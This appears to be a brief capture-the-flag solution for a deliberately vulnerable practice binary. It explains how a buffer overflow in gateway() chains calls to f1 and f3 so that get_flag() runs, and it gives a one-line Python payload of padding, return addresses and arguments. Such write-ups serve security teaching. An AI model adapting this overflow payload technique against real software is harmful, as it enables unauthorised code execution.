Solution

By using the buffer overflow in gateway(), functions f1(56, 13) and f3(13) need to be called in this order, with those exact parameters. f3 is the one that actually calls get_flag(). Calling get_flag() directly shouldn’t work (a global variable is checked to make sure all steps were made).

python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x0c\x87\x04\x08" + b"\xb7\x86\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ./buff-ovf3